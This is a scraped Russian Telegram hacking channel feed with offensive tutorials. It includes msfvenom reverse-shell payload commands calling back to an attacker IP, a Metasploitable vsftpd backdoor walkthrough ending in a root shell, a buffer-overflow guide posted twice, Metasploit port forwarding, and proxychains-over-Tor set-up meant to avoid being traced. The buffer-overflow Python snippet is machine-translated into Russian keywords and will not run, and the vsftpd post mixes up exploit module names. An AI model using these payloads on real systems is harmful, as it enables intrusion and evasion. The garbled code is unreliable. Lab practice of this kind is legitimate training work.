Kali Linux
53.3K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🔑 Rosenpass

Протокол обмена ключами, использующий методы, защищенные от атак квантовых компьютеров

Превращает ваш VPN в защищенный протокол от атак квантовых компьютеров

🖥 Github

#Security #Useful #Privacy #VPN

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥42👎2
👣 Zmap-ProxyScanner - быстрый способ поиска прокси. Поможет найти 2000-5000 рабочих http, socks4, socks5 прокси за одно сканирование.

⚙️ GitHub

#github #soft #Go

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍304🔥4🤩4
💣Коротко о перезаписи буфера💣

Рассмотрим как делается перезапись буфера. Давайте приступим к практике.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()

Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍152🔥2
⭐️ Free-proxy

Free proxy scraper written in python.

Бесплатный прокси-скрапер, написанный на python.

pip install free-proxy

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍32🥰2👎1
👁‍🗨Port forwarding👁‍🗨

Переадресация портов устанавливает безопасное соединение между удаленным пользователем и локальными машинами. В организациях можно указать номера портов источника и назначения, чтобы использовать туннелирование с помощью Linux. Наряду с этим они также должны указать пункт назначения, который может быть IP-адресом или именем хоста.

Давайте включим машину Kali Linux и проверим, размещена ли веб-страница на нашем local host'е. Итак, давайте посмотрим, как локальный адрес и порт могут быть перенаправлены на удаленный хост. Этого можно добиться разными способами, поэтому давайте рассмотрим их по очереди.

use auxiliary/scanner/ssh/ssh_login
set rhosts (ip удаленной машины)
set username (логин)
set password (пароль)
exploit
sessions -u 1
sessions 2
netstat -antp
portfwd добавить -l 8081 -p 8080 -r 127.0.0.1

@linuxkalii
👍10🔥32👎1👏1
🔥 Top it channels

⭐️ Нейронные сети
@data_analysis_ml - data science
@vistehno - chatgpt ведет блог, решает любые задачи и отвечает на любые ваши вопросы.
@aigen - сети для генерации картинок. видео, музыки и многого другого.
@neural – погружение в нейросети.

🖥 SQL базы данных

@sqllib - библиотека баз данных
@sqlhub - повышение эффективности кода с грамотным использованием бд.
@chat_sql - чат изучения бд.

🖥 Machine learning
@ai_ml – погружение в нейросети, ai, Chatgpt, midjourney, машинное обучение.
@machinelearning_ru – машинное обучении на русском от новичка до профессионала.
@machinelearning_interview – подготовка к собеседованию.
@datascienceiot – бесплатные книги Machine learning
@ArtificialIntelligencedl – канал о искусственном интеллекте

@machinee_learning – чат о машинном обучении
@datascienceml_jobs - работа ds, ml
@Machinelearning_Jobs - чат работы мл

🖥 Python

@pythonl - главный канал самого популярного языка программирования.
@pro_python_code – учим python с ментором.
@python_job_interview – подготовка к Python собеседованию.
@python_testit - проверочные тесты на python
@pythonlbooks - современные книги Python
@python_djangojobs - работа для Python программистов
@python_django_work - чат обсуждения вакансий


🖥 Javascript / front

@react_tg - - 40,14% разработчиков сайтов использовали React в 2022 году - это самая популярная библиотека для создания сайтов.
@javascript -канал для JS и FrontEnd разработчиков. Лучшие практики и примеры кода. Туториалы и фишки JS
@Js Tests - каверзные тесты JS
@hashdev - погружение в web разработку.
@javascriptjobjs - отборные вакансии и работа FrontEnd.
@jsspeak - чат поиска FrontEnd работы.

🖥 Java
@javatg - выучить Java с senior разработчиком по профессиональной методике.
@javachats - чат для ответов на вопросы по Java
@java_library - библиотека книг Java
@android_its - Android разработка
@java_quizes - тесты Java
@Java_workit - работа Java
@progersit - шпаргалки ит

👣 Golang
@Golang_google - восхитительный язык от Google, мощный и перспективный.
@golang_interview - вопросы и ответы с собеседований по Go. Для всех уровней разработчиков.
@golangtests - интересные тесты и задачи GO
@golangl - чат изучающих Go
@GolangJobsit - отборные вакансии и работа GO
@golang_jobsgo - чат для ищущих работу.
@golang_books - полезные книги Golang
@golang_speak - обсуждение языка Go

🖥 Linux
@linux -топ фишки, гайды, уроки по работе  с Linux.
@linux chat - чат linux для обучения и помощи.
@linux_read - бесплатные книги linux

👷‍♂️ IT работа

@hr_itwork -кураторский список актуальных ит-ваканнсии

🤡It memes
@memes_prog - ит-мемы

⚙️ Rust
@rust_code - Rust избавлен от болевых точек, которые есть во многих современных яп
@rust_chats - чат rust

#️⃣ c# c++
C# - объединяет лучшие идеи современных языков программирования
@csharp_cplus чат
С++ - Универсальность. Возможно, этот главный плюс C++.

📓 Книги

@programming_books_it - большая библиотека. программиста
@datascienceiot -ds книги
@pythonlbooks - python библиотека.
@golang_books - книги Golang
@frontendbooksit - front книги
@progersit - ит-шпаргалки
@linux_read - Linux books
@java_library - Java books

🖥 Github
@github_code - лучшие проекты с github
@bigdatai - инструменты по работе с данными

🖥 Devops
Devops - специалист общего профиля, которому нужны обширные знания в области разработки.

📢 English for coders

@english_forprogrammers - Английский для программистов
Please open Telegram to view this post
VIEW IN TELEGRAM
👍53
Как получить удаленный доступ к компьютеру или серверу если у вас есть такая возможность.

Для этой цели мы будем использовать Metasploit.

В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.

На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде: nc -lvp ваш порт.

Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.

Итак перейдем в делу. Есть несколько вариантов использования Metasploit.

Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨 msfvenom -p windows/x64/meterpreterreversetcp lhost=Ваш ip lport=Ваш порт -f aspx -o shell.aspx

При этом название используемого эксплойта будет:🗨 use exploit/multi/handler

* Using configured payload generic/shellreversetcp
msf5 exploit(multi/handler) >
🗨 set payload windows/x64/meterpreterreversetcp

Если аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨 msfvenom -p linux/x86/meterpreter/reversetcp LHOST=[Ваш ip] LPORT=[Ваш порт] -f elf > shell.elf
Это payload внутри опций в настройках.
🗨set payload linux/x86/meterpreter/reversetcp

@linuxkalii
👍12🔥43
PostHog — платформа для сборки и анализа сведений об источниках трафика

Также инструмент позволяет отслеживать взаимодействие пользователей с вашим приложением или сайтом

Отдельным приятным моментом является то, что PostHog имеет открытый исходный код. Его можно скачать с GitHub и развернуть на своей инфраструктуре

Стоимость: #бесплатно (но есть платные тарифы и функции)

#анализ #open_source

@linuxkalii
👍82🔥1
🔍 Cканнеры, которые предоставляют возможность пользователю, посмотреть уязвимые сегменты сети и предпринять каике то действия в связи с этим.

Всем нам в голову приходит nmap если мы говорим про сканнеры. И даже у него есть возможность посмотреть уязвимости.

Однако сегодня возьмем в качестве примера OpenVas. Это условно-бесплатное программное обеспечение которое мы с вами сейчас установим.

👁‍🗨Установка:
🗨apt install docker.io

🗨docker run -d -p 443:443 --name openvas mikesplain/openvas

Эта команда одновременно вытащит контейнер docker, а затем запустит контейнер. Для полной настройки и запуска контейнера может потребоваться несколько минут. Как только он будет завершен, вы сможете перейти к https://127.0.0.1 в вашем предпочтительном браузере и OpenVAS будет настроен и готов к работе!

После того как все будет готово - вашими данными для входа на локал хост будут admin:admin. Вы сможете нажать Task Wizzard чтобы более предметно ознакомится с приложением.

Сканирование уязвимостей подробнее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍171👎1🔥1
Механизмы безопасности: полезные шпаргалки для разработчиков

Недавно хакеры взломали «СберСпасибо» и опубликовали в сети базу, в которой содержатся несколько миллионов строк с личными данными пользователей. Кто же виноват? Слабая защита? Программисты? Код?

Сделали подборку шпаргалок в которых вы найдете, лучшие практики безопасности для разработчиков:

1. Java
2. Python
3. Go
4. Spring Boot
5. npm
6. GitHub

#java #python #go
👍8🔥21
💀SSTImap — современная утилита для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей внедрения кода и внедрения шаблонов на стороне сервера(Code Injection and Server-Side Template Injection/SSTI), использовать их, предоставляя доступ к самой операционной системе.

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

⚙️ GitHub

#redteam #pentest #github #soft #python

@linuxkalii
👍15🔥21
🖥 Linux-Privilege-Escalation-MindMap

Повышение привилегий в Linux. Отличная MindMap и годный полезный материал.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥53
🔍 Как можно взломать что-либо не зная языков программирования?

На самом деле эта тема очень интересная.

Взлом чего-то это очень часто манипуляция с данными на каком-то языке, однако если вы понимаете общую структуру иерархии этих данных то вам может быть намного проще.

Пример. Представим что мы используем XXE уязвимость. Я знаю, что вы скорее всего про нее знаете, поэтому сейчас объясню что это. Если в вкратце и простым языком, то это ошибка в следствие которой, можно вытянуть или даже получить удаленный доступ, или RCE с помощью неправильной фильтрации языка разметки (xml) на сервере.

Однако если вы знаете как взаимодействовать с этой ошибкой, можно использовать определенный готовый код, если у вас есть информация что он делает.

На GitHub'е есть полезные нагрузки для всех уязвимостей. Это очень облегчает работу с "кодом". Если вы ленивый но хитрый вы можете не учить язык программирования а просто взять какой-то готовый вариант. Но самое главное не делать ничего плохого. Ибо помните, что если наделаете делов то вас найдут.

Вот ссылка на раздел - https://github.com/swisskyrepo/PayloadsAllTheThings/

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍251🥰1
Выпуск дистрибутива для исследования безопасности Kali Linux 2023.1

- Предложена новая специализированная сборка Kali Purple (3.4 ГБ), включающая подборку платформ и инструментариев для организации защиты от атак.
- Обновлена тема оформления и загрузочная заставка.
- Пользовательские окружения обновлены до Xfce 4.18 и KDE Plasma 5.27.
- В настройках ядра отключено ограничение доступа к привилегированным сетевым портам (для прикрепления к портам с номерами до 1024 больше не нужен root). Сняты ограничения на запуск dmesg.
И другие изменения.

https://www.kali.org/blog/kali-linux-2023-1-release/

@linuxkalii
👍114🔥3
🎚️ Новая версия ChatGPT теперь в Telegram!

Для всех, кто еще не попробовал новую модель GPT4, рекомендуем бота абсолютно бесплатно.

Поможет написать код, диплом, придумает шутку и станет незаменимым помощником в любых задачах!

Бот: @Chatgpturbobot
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬73👍2👎2🔥1
Как делается перезапись буфера.

#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.

#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.

Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.

#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:

для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()

Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)

это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.

Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯

#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.

Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).

@linuxkalii
👍162👎2🔥1
⚜️ Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

💣Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)


И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍257🔥6
Основы работы с proxychains.

Это очень полезное программное обеспечение, которое я буквально недавно открыл для себя.

Proxychains - программное обеспечение, которое позволяет нам проводить проксимизацию то есть использовать множественное количество прокси серверов для анонимности. Это может помочь нам скрыть свой реальный ip адрес и остаться неизвестным для тех кто захочет нас найти!

#Дисклеймер
Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#Установка
Если у Вас нету proxychains, то вы можете его установить:
sudo apt install proxychains

#Находим конфиг
Теперь настроим конфиг для работы. Поэтому пишем команду для того чтобы его найти.
locate proxycains
Первый конфиг который вы увидите будет тем, что мы ищем.

#Редактируем конфиг для корректной работы
Смело идем туда чтобы исправить что все что надо, используя любой редактор текста. Знаю что все используют Vim но я всегда пользуюсь Nano.

Sudo nano /etc/proxychains4.conf

Вам надо будет убрать знак # перед dynamic_cahin и перед proxy_dns.
В первом случае если вы не уберете решетку, то proxychains просто не будет работать.

Во втором случае proxy_dns позволит Вам проксировать ваш DNS запрос. Так как, если вы этого не сделаете, то DNS останется вашим и Вас будет элементарно вычислить не смотря на смену IP адреса.

Смысл состоит в том, чтобы добавить прокси серверы в самом конце как и написано в примере. Сначала вид протокол потом IP адрес потом порт. И если есть логин и пароль то их тоже следует добавить.

#Добавляем конечным узлом наш прокси
Однако, если вы хотите анонимно просканировать сервер с помощью nmap то лучше всего включить проксирование через TOR, но тут есть момент, что возможно, мы столкнемся с ситуацией, когда сканирование не удастся, потому что конечные точки Tor заблокированы. Поэтому добавляем туда в конец обычный прокси сервер. Чтобы Сначала траффик шел от нас по серверам тор и проходил через наш новый прокси.

#Включаем TOR

Вклюючить проксирование через TOR можно написав в конце конфига и предварительно включить TOR:
sudo service tor start

В самом конфиге в конце пишем:

socks4 127.0.0.1 9050
socks5 127.0.0.1 9050


И последним может быть ваш прокси сервер после этих двух строчек. Такие дела.

@linuxkalii
👍22🔥42😁1
✔️ Что такое XSS на основе dom.

Что такое DOM?
DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».

@linuxkalii
👍124🔥3
⚜️ Anti keystroke deanonymization tool

kloak — инструмент обеспечения приватности, который снизит эффективность сбора биометрических данных нажатия клавиш

Делается путем скрытия временных интервалов между событиями нажатия и отпускания клавиш, которые используются для идентификации и деанонимизации

Вы можете запустить kloak как самостоятельное приложение или как службу GNU/Linux

🖥 Github

#linux

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍163🔥2